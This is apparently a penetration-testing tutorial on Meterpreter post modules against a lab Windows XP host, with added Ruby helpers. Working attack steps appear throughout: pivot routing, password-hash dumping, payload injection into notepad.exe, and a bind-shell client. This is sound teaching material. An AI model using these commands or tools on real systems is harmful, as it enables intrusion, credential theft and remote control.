autoroute
The autoroute post module adds a new route through a Meterpreter session, allowing you to pivot deeper into a target network: any traffic the framework sends to the specified subnet is relayed through the compromised host instead of your own network interface.
meterpreter > run post/windows/manage/autoroute SUBNET=192.168.218.0 ACTION=ADD

[*] Running module against V-MAC-XP
[*] Adding a route to 192.168.218.0/255.255.255.0...
meterpreter >
Background session 5? [y/N] y
With our new route added, we can run additional modules through our pivot, for example a port scan of the 192.168.218.0/24 network for hosts with SMB (TCP 445) open. Note that the SUBNET value had no mask, so autoroute applied its default of 255.255.255.0.
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 192.168.218.0/24
RHOSTS => 192.168.218.0/24
msf auxiliary(tcp) > set THREADS 50
THREADS => 50
msf auxiliary(tcp) > set PORTS 445
PORTS => 445
msf auxiliary(tcp) > run

[*] Scanned 027 of 256 hosts (010% complete)
[*] Scanned 052 of 256 hosts (020% complete)
[*] Scanned 079 of 256 hosts (030% complete)
[*] Scanned 103 of 256 hosts (040% complete)
[*] Scanned 128 of 256 hosts (050% complete)
[*] 192.168.218.136:445 - TCP OPEN
[*] Scanned 154 of 256 hosts (060% complete)
[*] Scanned 180 of 256 hosts (070% complete)
[*] Scanned 210 of 256 hosts (082% complete)
[*] Scanned 232 of 256 hosts (090% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tcp) >
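To make concrete what the added route does, here is an added example in Ruby; it is not part of the original page and does not use Metasploit's own autoroute code or routing table. It converts the netmask into the prefix length the "192.168.218.0/255.255.255.0" line above implies, decides which destination addresses would be relayed through session 5 (longest matching prefix wins, as in an ordinary routing table), and pulls the hosts reported open out of the portscan output. The route entries and the sample scan text are constructed for illustration from the session above.

```ruby
require 'ipaddr'

# Constructed from the session above: the subnet autoroute was given, the
# default netmask it applied because SUBNET carried no mask, and the session id.
PIVOT_SUBNET  = '192.168.218.0'
PIVOT_NETMASK = '255.255.255.0'
PIVOT_SESSION = 5

# Constructed: a trimmed copy of the portscan console output shown above.
SCAN_OUTPUT = <<~SCAN
  [*] Scanned 128 of 256 hosts (050% complete)
  [*] 192.168.218.136:445 - TCP OPEN
  [*] Scanned 154 of 256 hosts (060% complete)
  [*] Auxiliary module execution completed
SCAN

# Dotted netmask -> prefix length (255.255.255.0 -> 24). A mask whose set bits
# are not contiguous (255.0.255.0) is not a valid route mask and is rejected.
def prefix_length(netmask)
  bits = IPAddr.new(netmask).to_i
  len  = bits.to_s(2).count('1')
  contiguous = (0xffffffff << (32 - len)) & 0xffffffff
  raise ArgumentError, "non-contiguous netmask #{netmask}" unless bits == contiguous
  len
end

# One entry of a pivot routing table (illustrative, not Meterpreter's own):
# destinations inside subnet/netmask are relayed through the session.
Route = Struct.new(:subnet, :netmask, :session_id) do
  def cidr
    IPAddr.new("#{subnet}/#{prefix_length(netmask)}")
  end

  def covers?(ip)
    cidr.include?(IPAddr.new(ip))
  end
end

ROUTES = [Route.new(PIVOT_SUBNET, PIVOT_NETMASK, PIVOT_SESSION)].freeze

# Which session a destination would be relayed through; nil means it leaves
# the attacker's own interface. The most specific (longest) prefix wins.
def session_for(routes, ip)
  best = routes.select { |r| r.covers?(ip) }
               .max_by { |r| prefix_length(r.netmask) }
  best && best.session_id
end

# Hosts the portscan module reported with an open port: [[ip, port], ...]
def open_hosts(scan_output)
  scan_output.scan(/^\[\*\] (\d{1,3}(?:\.\d{1,3}){3}):(\d+) - TCP OPEN/)
             .map { |ip, port| [ip, port.to_i] }
end

if __FILE__ == $0
  %w[192.168.218.136 192.168.1.101].each do |ip|
    puts "#{ip} -> #{session_for(ROUTES, ip) || 'direct'}"
  end
  p open_hosts(SCAN_OUTPUT)
end
```

Running the file prints that 192.168.218.136 is reached via session 5 while 192.168.1.101 (the attacker's own address in the later section) goes out directly, and lists the single open host the scan found.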
delete_user
The delete_user post module deletes a specified user account from the compromised system.
meterpreter > run post/windows/manage/delete_user USERNAME=hacker
[*] User was deleted!
meterpreter >
We can then dump the password hashes on the system and verify that the user no longer exists on the target: the deleted account does not appear in the list.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:7bf4f254b228bb24aad1b435b51404ee:2892d26cdf84d7a70e2fb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
meterpreter >
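Rather than eyeballing the dump, the check can be scripted. The following is an added Ruby example, not part of the page or of the hashdump module: it parses the pwdump-format lines (user:RID:LM hash:NT hash:::) the module printed, confirms the deleted account is absent, and flags the facts a practitioner reads off such a dump before any cracking: a blank password (NT hash of the empty string), an account with no LM hash stored, and the built-in Administrator (RID 500). The sample dump is a copy of the output above.

```ruby
# Constructed: the pwdump-format lines hashdump printed above, plus one of the
# status lines the module emits before them (to show they are skipped).
HASHDUMP_OUTPUT = <<~DUMP
  [*] Dumping password hashes...
  Administrator:500:7bf4f254b228bb24aad1b435b51404ee:2892d26cdf84d7a70e2fb3b9f05c425e:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
DUMP

# LM and NT hashes of the empty password. An empty LM field next to a real NT
# hash means no LM hash is stored (NoLMHash policy or password over 14 chars).
EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

Account = Struct.new(:name, :rid, :lm, :nt) do
  def blank_password?
    nt == EMPTY_NT
  end

  def lm_stored?
    lm != EMPTY_LM
  end
end

# Parse user:rid:lmhash:nthash::: lines; anything else (status lines) is skipped.
def parse_hashdump(output)
  output.each_line.filter_map do |line|
    m = line.strip.match(/\A([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::\z/i)
    m && Account.new(m[1], m[2].to_i, m[3].downcase, m[4].downcase)
  end
end

# Windows account names are case-insensitive, so compare that way.
def user_present?(accounts, name)
  accounts.any? { |a| a.name.casecmp?(name) }
end

# Observations worth recording before any cracking is attempted.
def findings(accounts)
  accounts.flat_map do |a|
    notes = []
    notes << "#{a.name} (RID #{a.rid}): built-in Administrator" if a.rid == 500
    notes << "#{a.name} (RID #{a.rid}): blank password" if a.blank_password?
    notes << "#{a.name} (RID #{a.rid}): no LM hash stored" unless a.lm_stored? || a.blank_password?
    notes
  end
end

if __FILE__ == $0
  accounts = parse_hashdump(HASHDUMP_OUTPUT)
  puts "hacker still present? #{user_present?(accounts, 'hacker')}"
  puts findings(accounts)
end
```

On the dump above this reports that "hacker" is gone, that Guest has a blank password, that SUPPORT_388945a0 has no LM hash stored, and that Administrator is the RID 500 account.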
migrate
The migrate post module moves the Meterpreter session into a specified process (PID). If no PID is given, the module picks a target itself (in the run below it chooses explorer.exe); it can also spawn a fresh process and migrate into that. Migrating out of the exploited process early is worthwhile, since that process may crash or be terminated and take the session with it.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1092)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 672
[*] New server process: Explorer.EXE (672)
meterpreter >
multi_meterpreter_inject
The multi_meterpreter_inject post module injects a given payload into a process on the compromised host. If no PID value is specified, a new process (notepad.exe) is created and the payload is injected into it. Although the module is named multi_meterpreter_inject, any payload can be specified: below we inject windows/shell_bind_tcp, background the Meterpreter session, and use the msfconsole connect command to reach the resulting bind shell on port 4444. The "Creating a reverse meterpreter stager" line in the output is the module's fixed status text; the payload actually injected is the one given in PAYLOAD.
meterpreter > run post/windows/manage/multi_meterpreter_inject PAYLOAD=windows/shell_bind_tcp

[*] Running module against V-MAC-XP
[*] Creating a reverse meterpreter stager: LHOST=192.168.1.101 LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 3380
[*] Injecting meterpreter into process ID 3380
[*] Allocated memory at address 0x003a0000, for 341 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 3380
meterpreter > ^Z
Background session 5? [y/N] y
msf exploit(handler) > connect 192.168.1.195 4444
[*] Connected to 192.168.1.195:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.1.195
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

Ethernet adapter Local Area Connection 2:

        Connection-specific DNS Suffix  . : localdomain
        IP Address. . . . . . . . . . . . : 192.168.218.136
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.218.2

C:\WINDOWS\system32>
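The connect step above is nothing more than a raw TCP conversation with a cmd.exe whose standard handles are bound to port 4444. As an added example, not part of the page and not Metasploit code, the Ruby below drives such a bind shell programmatically: it reads until the cmd.exe prompt appears, sends one command, strips the echoed command line and the trailing prompt, and pulls the interface addresses out of ipconfig output, with a timeout so a dead shell does not hang the script. Because no target is available offline, the block also contains a constructed stand-in for the bind shell, listening on 127.0.0.1, that answers the way the XP host above did; the ipconfig text it serves is a trimmed copy of the output above.

```ruby
require 'socket'
require 'timeout'

# The prompt cmd.exe prints after each command on the host above ("C:\WINDOWS\system32>").
# Matched only at the very end of the buffer, so a prompt echoed mid-output
# (e.g. "C:\WINDOWS\system32>ipconfig") does not end the read early.
PROMPT = /^[A-Z]:\\[^\r\n>]*>\z/

# Read from the socket until the data so far ends in a cmd.exe prompt.
# Raises Timeout::Error if the shell stops answering.
def read_until_prompt(sock, timeout: 5)
  buf = +''
  Timeout.timeout(timeout) do
    loop do
      buf << sock.readpartial(4096)
      break if buf =~ PROMPT
    end
  end
  buf
end

# Send one command to a bind shell and return only that command's output.
def bind_shell_exec(host, port, command)
  TCPSocket.open(host, port) do |sock|
    read_until_prompt(sock)            # banner and first prompt
    sock.write("#{command}\r\n")
    raw   = read_until_prompt(sock)
    lines = raw.split(/\r?\n/)
    lines.shift if lines.first&.end_with?(command)  # cmd.exe echoes the input line
    lines.pop   if lines.last =~ PROMPT             # trailing prompt
    lines.join("\n")
  end
end

# Interface addresses from "IP Address. . . . : x.x.x.x" lines of ipconfig output.
def extract_ips(ipconfig_output)
  ipconfig_output.scan(/IP Address[ .]*: (\d{1,3}(?:\.\d{1,3}){3})/).flatten
end

# Constructed stand-in for the bind shell on 192.168.1.195:4444 so the client
# can be exercised offline. It mimics cmd.exe with stdin/stdout on a socket:
# banner, prompt, echo of each command, canned output, prompt again.
FAKE_BANNER = "Microsoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft Corp.\r\n"
FAKE_PROMPT = "\r\nC:\\WINDOWS\\system32>"
FAKE_OUTPUT = {
  'ipconfig' => "\r\nWindows IP Configuration\r\n\r\n" \
                "Ethernet adapter Local Area Connection 2:\r\n\r\n" \
                "        IP Address. . . . . . . . . . . . : 192.168.218.136\r\n"
}.freeze

# Starts the fake shell on an ephemeral loopback port and returns that port.
def start_fake_bind_shell
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    loop do
      Thread.new(server.accept) do |c|
        c.write(FAKE_BANNER + FAKE_PROMPT)
        while (line = c.gets)
          cmd = line.chomp
          c.write("#{cmd}\r\n")
          c.write(FAKE_OUTPUT.fetch(cmd) { "'#{cmd}' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n" })
          c.write(FAKE_PROMPT)
        end
      rescue IOError, SystemCallError
        # client went away; nothing to do
      ensure
        c.close
      end
    end
  end
  server.addr[1]
end

if __FILE__ == $0
  port = start_fake_bind_shell
  out  = bind_shell_exec('127.0.0.1', port, 'ipconfig')
  puts out
  p extract_ips(out)
end
```

Against the real host you would call bind_shell_exec('192.168.1.195', 4444, 'ipconfig') instead of starting the stand-in; the prompt pattern and the echo handling are what make the read boundaries reliable over a raw socket.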